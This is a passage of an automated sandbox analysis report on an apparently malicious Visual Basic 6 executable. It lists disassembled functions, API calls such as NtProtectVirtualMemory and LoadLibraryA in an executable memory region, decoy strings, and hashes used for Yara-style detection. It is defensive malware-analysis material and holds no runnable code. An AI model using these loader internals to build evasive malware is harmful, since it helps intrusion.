Instruction Fuzzy Hash: 68A2657160434ADFDF349E3889A83EA7BB3EF55350F95416ECC899B244D3358A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6FFF2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

t;, xrefs: 02B70088
p!, xrefs: 02B6FA36

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: p!$t;
API String ID: 0-3242210463
Opcode ID: 16eb961d65c8fd500560e87c0d3e15884e3bca94a6c7a069e40c459d66173b02
Instruction ID: 281dd1b8592a3852c9a9485208e1a6962e836932eaf40504abf904fcd1a75835
Opcode Fuzzy Hash: 16eb961d65c8fd500560e87c0d3e15884e3bca94a6c7a069e40c459d66173b02
Instruction Fuzzy Hash: 8C51377170034B9FCF30EE6989E87EA33A6EF56350F95816ADD6ACB101E7318981C742

Uniqueness

Uniqueness Score: -1.00%

Function 02B72905, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02B729E1

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 478831d38fcdeecbb30300c307cb127bae870bfc9d3d9c1976b2cbc1f49478c8
Instruction ID: d0198c19e389e94755fe28468d94018af5a59ade671a6222d973dac26a39d0bf
Opcode Fuzzy Hash: 478831d38fcdeecbb30300c307cb127bae870bfc9d3d9c1976b2cbc1f49478c8
Instruction Fuzzy Hash: 7F017C75648798CFDB28DE28CD187EAB3A6AFD4200F05803D9C4A9B204D730AD04CA55

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA90, Relevance: 149.5, APIs: 75, Strings: 10, Instructions: 716COMMON

Download Yara Rule

APIs

#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041EB46
__vbaStrMove.MSVBVM60 ref: 0041EB51
__vbaFreeVar.MSVBVM60 ref: 0041EB5A
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041EB73
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EB8C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,0000021C), ref: 0041EBAF
__vbaFreeObj.MSVBVM60 ref: 0041EBB8
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041EBD1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EBEA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C338,00000060), ref: 0041EC14
__vbaFreeObj.MSVBVM60 ref: 0041EC70
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,000006FC), ref: 0041ECD5
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000700), ref: 0041ECF0
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000704), ref: 0041ED12
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041ED27
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ED40
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C348,00000138), ref: 0041ED6A
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041ED83
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ED9C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C358,00000088), ref: 0041EDCC
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000708), ref: 0041EE15
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041EE21
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,0000070C), ref: 0041EEA5
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000710), ref: 0041EEF3
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041EF08
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EF21
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C3A0,00000098), ref: 0041EF4B
__vbaStrCopy.MSVBVM60 ref: 0041EF63
__vbaFreeStr.MSVBVM60 ref: 0041EF87
__vbaFreeObj.MSVBVM60 ref: 0041EF90
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041EFA9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EFC2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C3FC,00000090), ref: 0041EFE9
__vbaStrMove.MSVBVM60 ref: 0041EFF8
__vbaFreeStr.MSVBVM60 ref: 0041F01A
__vbaFreeObj.MSVBVM60 ref: 0041F023
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F03C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F055
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C40C,00000130), ref: 0041F07C
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 0041F08C
__vbaStrVarMove.MSVBVM60(00000002,?), ref: 0041F0AC
__vbaStrMove.MSVBVM60 ref: 0041F0B7
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000714), ref: 0041F0D5
__vbaFreeStr.MSVBVM60 ref: 0041F0E4
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041F0F0
__vbaFreeVar.MSVBVM60 ref: 0041F0FC
__vbaStrCopy.MSVBVM60 ref: 0041F10A
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000718), ref: 0041F157
__vbaFreeStr.MSVBVM60 ref: 0041F160
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F194
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F1AD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C484,00000128), ref: 0041F1D7
__vbaStrCopy.MSVBVM60 ref: 0041F1EB
__vbaStrCopy.MSVBVM60 ref: 0041F1F5
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,0000071C), ref: 0041F21F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F22F
__vbaFreeObj.MSVBVM60 ref: 0041F23B
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F254
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F26D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,000001A0), ref: 0041F297
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F2B0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F2C9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,000001B8), ref: 0041F2F0
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 0041F300
__vbaStrVarMove.MSVBVM60(00000002,EBD00000), ref: 0041F322
__vbaStrMove.MSVBVM60 ref: 0041F32D
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,0041BBA0,00000720), ref: 0041F35C
__vbaFreeStr.MSVBVM60 ref: 0041F365
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041F379
__vbaFreeVar.MSVBVM60 ref: 0041F385
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0041F3AE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F3C7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4BC,00000070), ref: 0041F3EB
__vbaFreeObj.MSVBVM60 ref: 0041F41F
__vbaFreeStr.MSVBVM60(0041F46B), ref: 0041F464

Strings

&|ZK, xrefs: 0041EC5D
Civilhortonomens7, xrefs: 0041F127
tilmeldelsesfristen, xrefs: 0041F00B
Flytels5, xrefs: 0041EE4B
Frikirkernes7, xrefs: 0041EF51
Variantfunktioner, xrefs: 0041F1E3
}%, xrefs: 0041EC53
Utilnrmeligheden2, xrefs: 0041F102
tankskib, xrefs: 0041F1ED
SALVAGEPROOF, xrefs: 0041EE57

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$Move$CopyList$CallLate$#702
String ID: &|ZK$Civilhortonomens7$Flytels5$Frikirkernes7$SALVAGEPROOF$Utilnrmeligheden2$Variantfunktioner$tankskib$tilmeldelsesfristen$}%
API String ID: 692815630-3634593783
Opcode ID: c640d98424ebcb969f2669bafaea4e5a35d4f00c050958a4c247ce8956670af6
Instruction ID: 53d50e6dc9e1393511022345b10057311028959a61ce4b12e926c542496a49f1
Opcode Fuzzy Hash: c640d98424ebcb969f2669bafaea4e5a35d4f00c050958a4c247ce8956670af6
Instruction Fuzzy Hash: AC525CB4A40218AFCB149FA0CD88FEAB778FF48300F504569F549E72A5DB746985CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401598, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 373COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!0&*), ref: 0040159D

Strings

VB5!0&*, xrefs: 00401598

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!0&*
API String ID: 1341478452-3535337563
Opcode ID: e71dba32bc670d7ca926d0c3dd929c1e19be919c7229144698211527947aa45e
Instruction ID: 6f8cb7d0e9a5cfb220fa47692fe608e7d342d794ba964a3ff551185cfd3acb06
Opcode Fuzzy Hash: e71dba32bc670d7ca926d0c3dd929c1e19be919c7229144698211527947aa45e
Instruction Fuzzy Hash: 6951212604E3C29FD7038B758868691BFB0AE1321471E55EBC4C1CF1B3D62C9D4ADB66

Uniqueness

Uniqueness Score: -1.00%

Function 02B6F49E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

p!, xrefs: 02B6FA36

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: p!
API String ID: 0-1310078687
Opcode ID: d43c5762aa5f03b6cfa12e76fbeb20a23121af001260738ecec73e190210bee1
Instruction ID: 4e0276fdcdd8ac5ae57df04aa7ee7f6b18dd506961054ac9ed4c2096aa398518
Opcode Fuzzy Hash: d43c5762aa5f03b6cfa12e76fbeb20a23121af001260738ecec73e190210bee1
Instruction Fuzzy Hash: 9A4122716013069FDF34AE6899A87FE37A6EF99350F94406ADD5A8B611E7348E80CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02B63DDE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 02B6C5D0

Strings

*, xrefs: 02B6C566

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: *
API String ID: 560597551-163128923
Opcode ID: 4416bea67e42b89f27196a8d0bf1cfade2aeb0b00ad42ef196d10024ea97d2e0
Instruction ID: 15f749900216afc7e4e4fbde360de7b77f58030423c83ba785a12e341302194b
Opcode Fuzzy Hash: 4416bea67e42b89f27196a8d0bf1cfade2aeb0b00ad42ef196d10024ea97d2e0
Instruction Fuzzy Hash: AE21AA72508346CFDB198E708DA93F2B7B1AF01B54F4406CECCC287582DB25878ACB02

Uniqueness

Uniqueness Score: -1.00%

Function 02B63E40, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 02B6C5D0

Strings

*, xrefs: 02B6C566

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: *
API String ID: 560597551-163128923
Opcode ID: 881e8ab602652f132b00ba66578d82390102a6ded6e0427cef56841bcfe1a7c0
Instruction ID: 6c12d74631a5da5f5d2a47f15f1be7421e68a62c24d83ab2d5242ccefabec48d
Opcode Fuzzy Hash: 881e8ab602652f132b00ba66578d82390102a6ded6e0427cef56841bcfe1a7c0
Instruction Fuzzy Hash: D4116A72508346CFDB298E7489993F57BB2AF05B84F5406DECDC287581DB29868AC702

Uniqueness

Uniqueness Score: -1.00%

Function 02B6F958, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(3531ED8F), ref: 02B6FA67

Strings

p!, xrefs: 02B6FA36

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: p!
API String ID: 1029625771-1310078687
Opcode ID: 3d32bd02fe41d5eab02216625519e090a516c3d9ba8f7cda5b2efea231c218f3
Instruction ID: a6e3d7f06a8042429556377d19bc89586ec3b17910cc042f9ac07686f7bf314c
Opcode Fuzzy Hash: 3d32bd02fe41d5eab02216625519e090a516c3d9ba8f7cda5b2efea231c218f3
Instruction Fuzzy Hash: 2401807561134B9BDF34EEA58AE87EE3365EF58380F90402ACD5E8B515D7314A80CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02B61584, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02B61584

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 036eeaecc2b1b432e5bbb94de583cd6deace60e5b2346b8e242360551b522036
Instruction ID: 0231d3f2900b6437fd557cefa308420dff04d29f1d38a9b71034f1ee68f7c64b
Opcode Fuzzy Hash: 036eeaecc2b1b432e5bbb94de583cd6deace60e5b2346b8e242360551b522036
Instruction Fuzzy Hash: A6E0DF228D4A0ECFC3219F1C84032E8B762AB52304F16048EC91A9FB26D73187D68F40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B6D199, Relevance: 2.9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

Strings

4@T, xrefs: 02B6D870
NH*, xrefs: 02B6D793

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 4@T$NH*
API String ID: 0-2544888271
Opcode ID: 6b00c45a344d4254e9b044115388097e2e6a2802f1220aeafb34ee37411b345e
Instruction ID: ad9070908e2cdf7b7844b5ce3ed9359885cab895d6b12b719f9cadbcf0c32a9f
Opcode Fuzzy Hash: 6b00c45a344d4254e9b044115388097e2e6a2802f1220aeafb34ee37411b345e
Instruction Fuzzy Hash: 06D1583164438ADFCF348E64CD987FA33A3EF55340F85416ACD8A9B244E7368A85CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02B70232, Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

u(nt, xrefs: 02B702A3

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: u(nt
API String ID: 0-3891096550
Opcode ID: 407be6b48f0f69150b005457f8c79d5e032f0a4b257e34e23af008821b6d1216
Instruction ID: 39a53b99bf15ecb3cdfc000dfec0c1aa2a5c79ea958ce460173ca06586d2e144
Opcode Fuzzy Hash: 407be6b48f0f69150b005457f8c79d5e032f0a4b257e34e23af008821b6d1216
Instruction Fuzzy Hash: 82119A75609B44DFCB74DF24C998BEA73A1FF18700F1188AAD9699F264C3709A41CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040430D, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 340c4f2df067ddc752539978ff7b2671b4e8b97287845807bb71162ef46cbe7c
Instruction ID: d0f2fbe90b277a102ce7c6ac6250ff22b22def6822ae4febdf8d6c0cd1017e20
Opcode Fuzzy Hash: 340c4f2df067ddc752539978ff7b2671b4e8b97287845807bb71162ef46cbe7c
Instruction Fuzzy Hash: DE31288125C3C1AED71B1B7140653F67FA09D8336472CA2EEC9D24B5A3C5368447A3CA

Uniqueness

Uniqueness Score: -1.00%

Function 02B715AA, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a9efed658ef4ff6dd28006d9737cbbbadbc997ec483b21caa834d5212d2132
Instruction ID: afa798985f5c5463df36b8291428c6a726902647ce6197debf559f87933f5758
Opcode Fuzzy Hash: a5a9efed658ef4ff6dd28006d9737cbbbadbc997ec483b21caa834d5212d2132
Instruction Fuzzy Hash: 103147757083498BDB389D688D743FA23A3EFD6390FC5416EDD8B9B244CB744A45C612

Uniqueness

Uniqueness Score: -1.00%

Function 02B6F8FD, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0105730e4e1897a8e47e93a2ddb67f4ffb42cf94f2ae241c1535781571442ad2
Instruction ID: ece9a625148c7ac972d68146dfbe26a7b34ed7df4dd35a87b2f41b5c05e058ad
Opcode Fuzzy Hash: 0105730e4e1897a8e47e93a2ddb67f4ffb42cf94f2ae241c1535781571442ad2
Instruction Fuzzy Hash: 25C04C31711540CFDB95CA29C154BA173B1BB54B00B815494A446CBA51D224D800CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02B6C602, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833e60185906836c724e700a743ddec3d2f94a23220a40fb7a05f18ca21770d5
Instruction ID: c35b81834fe16a26633c95567891ede761b5471621ba8976de7cf073b750e71a
Opcode Fuzzy Hash: 833e60185906836c724e700a743ddec3d2f94a23220a40fb7a05f18ca21770d5
Instruction Fuzzy Hash: 7FB092B62016808FEF06CE08C482B4073B0FB05A84B0904D0E402CB712C228E904CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00429B40, Relevance: 93.1, APIs: 51, Strings: 2, Instructions: 373COMMON

Download Yara Rule

APIs

#534.MSVBVM60 ref: 00429BA4
__vbaVarDup.MSVBVM60 ref: 00429BBE
#520.MSVBVM60(?,?), ref: 00429BCC
__vbaVarTstNe.MSVBVM60(?,?), ref: 00429BF1
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00429C04
#594.MSVBVM60(?), ref: 00429C28
__vbaFreeVar.MSVBVM60 ref: 00429C31
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429C49
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429C74
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000E0), ref: 00429CA2
__vbaStrMove.MSVBVM60 ref: 00429CB3
__vbaFreeObj.MSVBVM60 ref: 00429CB8
#539.MSVBVM60(0000000A,00000001,00000001,00000001), ref: 00429CC8
__vbaStrVarMove.MSVBVM60(0000000A), ref: 00429CD8
__vbaStrMove.MSVBVM60 ref: 00429CDF
__vbaFreeVar.MSVBVM60 ref: 00429CE4
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429CFD
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429D22
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000C8), ref: 00429D4B
__vbaFreeObj.MSVBVM60 ref: 00429D50
#593.MSVBVM60(0000000A), ref: 00429D68
__vbaFreeVar.MSVBVM60 ref: 00429D73
#613.MSVBVM60(?,0000000A), ref: 00429D8C
__vbaStrVarMove.MSVBVM60(?), ref: 00429D96
__vbaStrMove.MSVBVM60 ref: 00429D9D
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?), ref: 00429DAC
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429DCE
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429DF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000D8), ref: 00429E1D
__vbaStrMove.MSVBVM60 ref: 00429E2C
__vbaFreeObj.MSVBVM60 ref: 00429E35
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 00429E4E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429E63
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C730,00000098), ref: 00429E8A
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429E9F
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,0000004C), ref: 00429EC0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C590,00000024), ref: 00429EE9
__vbaStrMove.MSVBVM60 ref: 00429EF8
__vbaFreeStr.MSVBVM60 ref: 00429F01
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00429F11
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429F36
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429F5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000058), ref: 00429F7B
__vbaStrMove.MSVBVM60 ref: 00429F86
__vbaFreeObj.MSVBVM60 ref: 00429F8F
__vbaFreeStr.MSVBVM60(00429FFA), ref: 00429FDE
__vbaFreeStr.MSVBVM60 ref: 00429FE3
__vbaFreeStr.MSVBVM60 ref: 00429FE8
__vbaFreeStr.MSVBVM60 ref: 00429FED
__vbaFreeStr.MSVBVM60 ref: 00429FF2
__vbaFreeStr.MSVBVM60 ref: 00429FF7

Strings

YOVEN, xrefs: 00429ECF
rr, xrefs: 00429BB0

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$List$#520#534#539#593#594#613
String ID: rr$YOVEN
API String ID: 153930923-4016629446
Opcode ID: 888e98c9204eac545b8df020c085c2c4944a1119fd0f3ba57c977cd9d0b45f8e
Instruction ID: d1ea98bccbdd50894b3ebb1123db0d0e43fb6c87e4d0b1ae19cfc5870940c6cd
Opcode Fuzzy Hash: 888e98c9204eac545b8df020c085c2c4944a1119fd0f3ba57c977cd9d0b45f8e
Instruction Fuzzy Hash: B3E17D70E40219AFCB14DFA4ED88ADEBBB9FF54701F10412AE105F72A0DBB45945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004293B0, Relevance: 82.6, APIs: 43, Strings: 4, Instructions: 395COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00429432
#583.MSVBVM60(00000000,00000000), ref: 0042943A
__vbaFpR8.MSVBVM60 ref: 00429440
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429469
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,0000004C), ref: 00429494
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C590,00000028), ref: 004294B8
__vbaFreeObj.MSVBVM60 ref: 004294C3
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 004294D8
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 004294FD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000068), ref: 00429520
__vbaFreeObj.MSVBVM60 ref: 00429525
#690.MSVBVM60(pladsbestillingen,mesothelae,Disnaturalise,preoutfitted), ref: 0042953B
#705.MSVBVM60(?,00000000), ref: 00429555
__vbaStrMove.MSVBVM60 ref: 00429566
__vbaFreeVar.MSVBVM60 ref: 0042956B
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429584
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 004295A9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000108), ref: 004295D2
__vbaFreeObj.MSVBVM60 ref: 004295D7
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 004295F0
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429615
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000060), ref: 00429635
__vbaStrMove.MSVBVM60 ref: 00429644
__vbaFreeObj.MSVBVM60 ref: 0042964F
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 00429664
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 00429689
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000C0), ref: 004296B2
__vbaFreeObj.MSVBVM60 ref: 004296B7
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 0042970F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429728
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C4E0,00000178), ref: 0042974F
#596.MSVBVM60(00000002,?,?,?,?,?,?), ref: 00429791
__vbaStrMove.MSVBVM60 ref: 0042979C
__vbaFreeObj.MSVBVM60 ref: 004297A5
__vbaFreeVarList.MSVBVM60(00000007,00000009,?,?,?,?,?,?), ref: 004297D5
__vbaNew2.MSVBVM60(0041CAC0,0042B010), ref: 004297FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00429818
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041C328,00000220), ref: 0042985B
__vbaFreeObj.MSVBVM60 ref: 00429864
__vbaFreeStr.MSVBVM60(004298E8), ref: 004298D6
__vbaFreeStr.MSVBVM60 ref: 004298DB
__vbaFreeStr.MSVBVM60 ref: 004298E0
__vbaFreeStr.MSVBVM60 ref: 004298E5

Strings

Disnaturalise, xrefs: 0042952C
preoutfitted, xrefs: 00429527
pladsbestillingen, xrefs: 00429536
mesothelae, xrefs: 00429531

Memory Dump Source

Source File: 00000001.00000002.22301287700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.22301258316.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.22301516084.000000000042B000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#583#596#690#705CopyList
String ID: Disnaturalise$mesothelae$pladsbestillingen$preoutfitted
API String ID: 1306337204-3129089085
Opcode ID: e77d65441bbb11f156c978375846083aa7de462f37469e8b576dad2175880851
Instruction ID: 73ca830af1a87315c4bc212fbb2592d8f6d2f672a3729e2c52f8f47c7d0d7950
Opcode Fuzzy Hash: e77d65441bbb11f156c978375846083aa7de462f37469e8b576dad2175880851
Instruction Fuzzy Hash: 49E17CB1A40229AFCB10DFA4DD84BDEBBB8FF58700F10816AE505E72A0D7B45945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3B0, Relevance: 82.6, APIs: 44, Strings: 3, Instructions: 357COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041E424
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041E449
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,00000060), ref: 0041E46D
__vbaStrCat.MSVBVM60(?,About ), ref: 0041E487
__vbaStrMove.MSVBVM60 ref: 0041E494
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041BB70,00000054), ref: 0041E4AF
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041E4BF
__vbaFreeObj.MSVBVM60 ref: 0041E4CB
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041E4E4
__vbaHresultCheckObj.MSVBVM60(00000000,02B8E8CC,0041C2C8,00000014), ref: 0041E509
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041C2E8,000000B8), ref: 0041E533
__vbaNew2.MSVBVM60(0041C2D8,0042B6DC), ref: 0041E54C
